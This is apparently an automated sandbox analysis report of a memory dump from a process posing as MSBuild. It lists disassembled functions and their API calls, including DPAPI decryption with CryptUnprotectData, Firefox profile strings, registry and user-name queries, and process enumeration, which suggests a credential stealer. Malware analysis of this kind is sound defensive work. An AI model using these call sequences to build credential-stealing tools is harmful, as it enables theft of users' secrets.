                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$Local$AllocCloseCreateFreeH_prologHandleReadSize
                                                                                          • String ID:
                                                                                          • API String ID: 3869837436-0
                                                                                          • Opcode ID: 64a3422522f7e7e46d77fb1e68ae032180970e1801099016b3dac20f8dd4ba7d
                                                                                          • Instruction ID: 909566f9f53506b5aa2d8709c9cb46b640c87a2d020782bf56f99dd61eaf9922
                                                                                          • Opcode Fuzzy Hash: 64a3422522f7e7e46d77fb1e68ae032180970e1801099016b3dac20f8dd4ba7d
                                                                                          • Instruction Fuzzy Hash: 6E218B70A00115ABDB20AFA4DC48EAFBBB9FF95710F20056EF952E62D4D7389911CB64
                                                                                          Function 0041064B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40registrymemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory), ref: 0041065F
                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory,00000000,?), ref: 00410666
                                                                                          • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?), ref: 00410694
                                                                                          • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000), ref: 004106B0
                                                                                          • RegCloseKey.ADVAPI32(00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory,00000000,?), ref: 004106B9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                          • String ID: Windows 11
                                                                                          • API String ID: 3466090806-2517555085
                                                                                          • Opcode ID: 5f1e27fdb62b933d2b61b99a876454972edf3bd6176160e80f00ebf938befaf3
                                                                                          • Instruction ID: 104df8f2525a0fd679668ea989e6de38b513391d3ca0bb797f84468fdfaa6df1
                                                                                          • Opcode Fuzzy Hash: 5f1e27fdb62b933d2b61b99a876454972edf3bd6176160e80f00ebf938befaf3
                                                                                          • Instruction Fuzzy Hash: 19F06279640215FBEB209BD1DD0AFAA7A7EEB49B04F201075FB01E61A0D7B49A509B24
                                                                                          Function 00417250 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00417330: LoadLibraryA.KERNEL32(kernel32.dll,00417262), ref: 00417335
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041737A
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417391
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173A8
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173BF
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173D6
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173ED
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417404
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041741B
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417432
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417449
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417460
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417477
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041748E
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174A5
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174BC
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174D3
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174EA
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417501
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417518
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041752F
                                                                                            • Part of subcall function 00417330: LoadLibraryA.KERNEL32 ref: 00417540
                                                                                            • Part of subcall function 00417330: LoadLibraryA.KERNEL32 ref: 00417551
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 0040FBCB: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,0042656F), ref: 0040FBD7
                                                                                            • Part of subcall function 0040FBCB: HeapAlloc.KERNEL32(00000000,?,?,?,00417274,0042656F), ref: 0040FBDE
                                                                                            • Part of subcall function 0040FBCB: GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004172D5
                                                                                          • Sleep.KERNEL32(00001B58), ref: 004172E0
                                                                                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,?,00426AC0,?,00000000,0042656F), ref: 004172F1
                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00417307
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00417315
                                                                                          • ExitProcess.KERNEL32 ref: 0041731C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryLoadlstrcpy$CloseEventHandleHeapProcess$AllocCreateExitH_prologNameOpenSleepUserlstrcatlstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 1043047581-0
                                                                                          • Opcode ID: 63899c68169e41570f029a222e57a0ca82ee8ba73f8e0d272385d8930f0730d7
                                                                                          • Instruction ID: 5fe09bd252f0d150a6d3d00478baf6c0c38f56ac8277075a71d8cdb1780555ff
                                                                                          • Opcode Fuzzy Hash: 63899c68169e41570f029a222e57a0ca82ee8ba73f8e0d272385d8930f0730d7
                                                                                          • Instruction Fuzzy Hash: 45112C71900019BBCB11FBA2DD6ADEEB77DAE55304B50007EB502B24E1DF386A09CA69
                                                                                          Function 0040B1E0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 186stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 0040B1E5
                                                                                            • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                            • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                            • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                            • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                            • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                            • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                            • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                            • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                            • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                            • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                            • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00425ED8,00425BE3), ref: 0040B2A6
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0040B2C2
                                                                                            • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                            • Part of subcall function 0040AFAF: _EH_prolog.MSVCRT ref: 0040AFB4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: H_prolog$lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                          • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                          • API String ID: 2813378046-3310892237
                                                                                          • Opcode ID: 0171a6eed1cad274af742993f372e6eb5dbe1f221bce049fb29b10c6c864d2db
                                                                                          • Instruction ID: 4f6f4bd48829af219670311540be59081c9cea49b359b7f79f2b82a8f20ba16d
                                                                                          • Opcode Fuzzy Hash: 0171a6eed1cad274af742993f372e6eb5dbe1f221bce049fb29b10c6c864d2db
                                                                                          • Instruction Fuzzy Hash: F6715D70905248AACB14FBE5D516BDDBBB4AF19308F50417EE805736C2DB78670CCB66
                                                                                          Function 004064E5 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 153libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 004064EA
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                            • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                            • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                          • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,?,?,00425B44,?,?,?,00425B3F,?), ref: 004065A7
                                                                                            • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,0042655F,0042655E,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                            • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                          • SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,00425B48,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00425B43), ref: 0040661F
                                                                                          • LoadLibraryA.KERNEL32(00000000), ref: 0040663A
                                                                                          Strings
                                                                                          • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0040659B, 004065A0, 004065BA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: lstrcpy$H_prolog$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                          • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                          • API String ID: 757424748-3463377506
                                                                                          • Opcode ID: f6ce9d2092b8488091eba00a9cdcecb47d6563a634a2b248d5590a137b97323b
                                                                                          • Instruction ID: b62f1dd5ee535d8e5f8645b721c07d1aad3572f7288e272c7e543ebc5a1b68b9
                                                                                          • Opcode Fuzzy Hash: f6ce9d2092b8488091eba00a9cdcecb47d6563a634a2b248d5590a137b97323b
                                                                                          • Instruction Fuzzy Hash: 7B617170801544EECB25EBA4EA15AEDBBB5EB28304F10507EE506736E2DB381A09CF65
                                                                                          Function 0040C186 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 0040C18B
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                            • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                            • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                            • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                            • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                            • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                            • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                          • StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040C1DE
                                                                                            • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406262
                                                                                            • Part of subcall function 00406242: LocalAlloc.KERNEL32(00000040,004058F9,?,?,004058F9,00000000,?,?), ref: 00406270
                                                                                            • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406286
                                                                                            • Part of subcall function 00406242: LocalFree.KERNEL32(00000000,?,?,004058F9,00000000,?,?), ref: 00406295
                                                                                          • memcmp.MSVCRT ref: 0040C21C
                                                                                            • Part of subcall function 004062A5: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004062C8
                                                                                            • Part of subcall function 004062A5: LocalAlloc.KERNEL32(00000040,?,?), ref: 004062E0
                                                                                            • Part of subcall function 004062A5: LocalFree.KERNEL32(?), ref: 004062FE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Local$Alloc$CryptFile$BinaryFreeH_prologString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                                          • String ID: $DPAPI
                                                                                          • API String ID: 2477620391-1819349886
                                                                                          • Opcode ID: 7dfd3c404522f5fba9cfd470d0499fc11dcebd0c230a6c7a8048448d2f3d36ba
                                                                                          • Instruction ID: 8b9103f373224ef9c7d1e1e34525f01fb5e997a78b4ac406efbcf79e04d5bcd8
                                                                                          • Opcode Fuzzy Hash: 7dfd3c404522f5fba9cfd470d0499fc11dcebd0c230a6c7a8048448d2f3d36ba
                                                                                          • Instruction Fuzzy Hash: 8B21A272D00109ABCF10ABE5CD42AEFBB79AF54314F14027BF901B11D2EA399A958699
                                                                                          Function 0040913E Relevance: 7.8, APIs: 5, Instructions: 274filestringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 00409143
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                            • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                            • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                            • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040921D
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 004093E4
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 004093F8
                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 0040947A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: H_prologlstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                          • String ID:
                                                                                          • API String ID: 3423466546-0
                                                                                          • Opcode ID: 11db608995ccd72e57995140e9430edd233334ab05fc65fed0a96f20b0681f76
                                                                                          • Instruction ID: 49701c4b31c8d318cf39a30ad3edccb9fb9ad7eb1a88c61520d5ae36ab01da66
                                                                                          • Opcode Fuzzy Hash: 11db608995ccd72e57995140e9430edd233334ab05fc65fed0a96f20b0681f76
                                                                                          • Instruction Fuzzy Hash: 64B14A71904248EACB15EBE4D965BDDBBB4AF28308F54407EE406735C2DB782B0DDB26
                                                                                          Function 004102C3 Relevance: 7.6, APIs: 5, Instructions: 70processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 004102C8
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410303
                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 00410314
